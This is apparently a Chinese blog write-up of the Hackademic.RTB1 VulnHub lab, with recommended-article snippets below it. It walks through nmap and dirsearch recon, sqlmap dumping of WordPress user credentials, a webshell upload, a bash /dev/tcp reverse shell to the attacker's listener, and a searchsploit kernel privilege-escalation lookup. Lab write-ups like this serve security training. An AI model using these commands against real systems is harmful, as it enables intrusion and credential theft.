Hackademic.RTB1靶场练习

最新推荐文章于 2024-05-06 10:13:52 发布
最新推荐文章于 2024-05-06 10:13:52 发布
阅读量65 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78494717/article/details/134273538
版权
  • 环境搭建

1)将靶机换成NAT模式的网络适配器。Kali也调成NAT模式。

Kali进行本网段扫描,并查看kali  IP

arp-scan -I eth0 -l

靶机IP:192.168.92.130

Kali(攻击机)IP:192.168.92.131

  • 信息收集
  • 对靶机进行全端口扫描

nmap -sS 192.168.118.128 -p 0-65535

发现22、80端口开放

        对22、80端口详细扫描

nmap -sV -p22,80 192.168.92.130

发现22端口是ssh服务,80端口是Apache httpd 2.2.15且系统是Fedora

        2.对192.168.92.130目录扫描

dirsearch -u 192.168.92.130

dirsearch -u 192.168.174.130/Hackademic_RTB1

发现wp-login.php登录页面

4)访问192.168.92.130

点击Got root?继续跟进页面

出现?P=9,怀疑存在sql注入,我们手动注入一下,一阵判断发现此页面并无sql注入

Sqlmap跑一下

再点击Uncategorized

发现页面有?Cat=1,可能有SQL注入

手工注入一下

用sqlnmap跑一下

sqlmap -u 192.168.92.130/Hackademic_RTB1/?cat=1 --dbs --batch

 sqlmap -u http://192.168.92.130/Hackademic_RTB1/?cat=1 --dbms=Mysql -D wordpress --tables --batch

 sqlmap -u http://192.168.92.130/Hackademic_RTB1/?cat=1 --dbms=Mysql -D wordpress -T wp_users --columns --batch      

sqlmap -u http://192.168.92.130/Hackademic_RTB1/?cat=1 --dbms=Mysql -D wordpress -T wp_users -C user_login,user_pass --dump --batch   

使用前面所找到的登录页面进行登录,发现只有登录GeorgeMiller账号出现文件上传点,设置允许上传文件

在下面名单添加php,然后上传哥斯拉木马

进入命令执行,发现权限不足

反弹到kali去

bash -i >&/dev/tcp/192.168.174.129/9999 0>&1

kali监听9999

nc -lvvp 9999

查看系统版本

uname -a

搜索版本的漏洞

searchsploit 2.6.3 | grep "Local Privilege Escalation"

查看完整的路径

searchsploit -p linux/local/15285.c

把15285.c复制到/var/www/html下

sudo cp  /usr/share/exploitdb/exploits/linux/local/15285.c  /var/www/html/15285.c

启动apache

systemctl restart apache2.service

找到flag

山&&海
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[靶机渗透笔记] HACKADEMIC: RTB1
H4ppyD0g的博客
01-23 2203
靶机链接https://www.vulnhub.com/entry/hackademic-rtb1,17/ 确定靶机 扫描存活主机 sudo nmap -sP 192.168.200.129/24 扫描具体信息 sudo nmap 192.168.200.129/24 192.168.200.134开启22和80端口,为靶机的ip地址。 前期扫描 nmap扫描靶机开启的两个端口的版本信息 sudo nmap -p 22,80 -sV 192.168.200.134 针对80端口 nmap默认脚本扫
Hackademic.RTB1靶场
m0_72012500的博客
11-01 78
输入:sqlmap -u 'http://192.168.76.223/Hackademic_RTB1/?输入:sqlmap -u 'http://192.168.76.223/Hackademic_RTB1/?
hackademic.RTB1(利用php_reverse_shell)
JyajT的博客
04-23 320
针对vulhub的练习
[VulnHub靶机渗透] Hackademic: RTB1
最新发布
人若无名,便可专心练剑
05-06 1027
靶机精讲之Hackademic: RTB1,vulnhub靶机,手动SQL注入,小试牛刀,内核提权。读遍牙签三万轴,欲来小邑试牛刀。
渗透测试——Hackademic.RTB1靶场
m0_54950156的博客
10-31 249
先用phpinfo测试,将hello.php的内容修改为<?由于目标系统是32位的linux系统,因此选择payload时要选linux/x86的模块。对靶机IP扫描全端口,发现只有两个端口,但只有80端口开放。页面延时5秒,确定存在注入点,数字型,无需闭合符。使用GeorgeMiller登录后台,用户权限最高。使用bp暴力破解,使用户名和密码一一对应。设置参数,获得会话,权限提升到root。靶机:192.168.64.149。目录扫描未发现有用的目录。Msf开启监听,获取权限。语言解析环境:PHP。
Hackademic.RTB1靶场详细通关教程
weixin_59147806的博客
11-10 162
Hackademic.RTB1靶场详细通关教程,包括getshell、提权及flag获取。
Hackademic.RTB1
weixin_44770698的博客
12-08 322
靶场练习
【Vulnhub靶机】Hackadmeic.RTB1
过期的秋刀鱼
08-19 478
(此系列共2台)难度:初级。
Vulnhub系列靶机-Hackadmeic.RTB1
来日可期的博客
09-17 1628
刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录。并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。提交之后,需要获取到上传的路径,才可以触发反弹shell。,发现有SQL语句的报错信息,可以判断有SQL注入漏洞。扫描到了22端口和80端口,但是22端口的关闭的。在点击页面中能点击的链接的时候,发现点击。
MATLAB RTB(RoboticsToolbox for MATLAB)9.10安装包
09-12
1. **机器人建模**:RTB9.10允许用户创建复杂的机器人模型,包括连杆结构、关节类型以及传感器配置。用户可以定义机械臂的各个链接,设置关节的自由度,并且可以处理各种类型的关节,如旋转关节、平移关节等。 2. *...
OpenRTB2.5的中文翻译文档
01-13
1. **Bid Request**:这是由Ad Exchange发送给DSP的信息,其中包含了广告展示的所有相关信息,如广告位ID、用户信息、上下文信息(如网页内容、设备信息等)、时间戳、以及拍卖的规则等。 2. **Bid Response**:DSP...
iwanvi-adx RTB协议规范1
08-04
1. **广告询价请求(Bid Request)**:ADX向DSP发送一个包含用户信息、广告位详情、历史行为数据等的请求。这一步骤的目标是让DSP获取到足够的信息来决定是否参与竞标以及出价多少。 2. **出价结果与广告代码返回...
RTB实时竞价算法.doc
10-07
1. 算法简介 RTB实时竞价算法是一种基于实时数据的竞价算法,它可以实时地对广告进行竞价,并根据竞价结果确定广告的展示顺序。该算法主要应用于数字营销领域,旨在提高广告的展示效果和投放效率。 1.1 算法用途 ...
matlab 机器人工具箱 m类型 RTB.mltbx
05-01
matlab 机器人工具箱 适合于毕业设计、自学、科研等 在MATLAB的环境下,使用RoboticsToolbox工具箱建立该机器人的数学模型,并对其进行运动学仿真及轨迹规划。 在官网下载的 绝对好用 安装路径 只需要在matlab ...
oscp——Hackademic: RTB1
王嘟嘟的博客
02-22 577
0x00 前言 这是第33台机子啦 0x01 信息收集 0x02 Web80——webshell 访问一下网站,发现一个说明,这个时候一般都是要扫一下目录。 这里找到了一个特别的url,这里测试了一下sql注入 http://192.168.25.207/Hackademic_RTB1/?cat=1 拿到了一些账号密码,使用GeorgeMiller q1w2e3 进行登录 写一个反弹s...
Vulnhub靶机系列:Hackademic: RTB1
汗的博客
03-30 2182
https://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/ 文章目录靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/hackademic-rtb1,17/ 靶机设置 利用知识及工具 信息收集并getshell 提权 总结 ...
渗透测试靶机---Hackademic.RTB1
久恙502的博客
11-01 176
渗透测试,打靶经历记录,大佬多多指点,谢谢!
Hackadmeic.RTB1靶场
chongya927的博客
07-19 115
只需要把“cat=1”改为不存在的值,前面查不出来就会查询后面的。这样虽然修改成功,但不知道hello.php的路径在哪,从头再看看,发现扫描出的目录没仔细看,只看了一个后台登录界面。User_pass中的密码,经过sqlmap自带字典解密出了5个,还有一个没解出来,用md5查出来密码为PUPPIES。脚本执行成功,这里切换用户需要交互式shell,使用python获得交互式shell后切换到脏牛用户,提权成功。,开始是直接扫了IP,现在多了一个目录/Hackademic_RTB1/,那么直接扫该目录。
rtb10.4.mltbx下载
11-16
rtb10.4.mltbx是一个MATLAB工具箱文件,用于在MATLAB软件中进行实时竞价广告买卖(RTB)相关的数据处理和分析。要下载这个工具箱文件,您可以按照以下步骤操作: 首先,您需要通过互联网连接到MATLAB官方网站或者其他可靠的下载渠道。 接着,在搜索框中输入“rtb10.4.mltbx”,然后点击搜索按钮。 在搜索结果中找到并点击rtb10.4.mltbx工具箱的下载链接。 在下载页面上,可能需要您登录MATLAB账户或者进行一些身份验证。 完成身份验证后,您可以点击下载按钮,等待文件下载完成。 一旦rtb10.4.mltbx文件下载完成,您可以在MATLAB软件中打开该文件进行安装。 在MATLAB软件中,选择“添加-Ons”选项,然后选择“从文件安装”来导入rtb10.4.mltbx文件。 导入成功后,您就可以在MATLAB中使用rtb10.4.mltbx工具箱了。 需要注意的是,下载任何文件时都需要注意文件来源的可靠性,以免下载到恶意软件或病毒。另外,如果是在工作环境中使用,可能需要获得相关许可证或者和公司的IT部门协商才能进行安装和使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值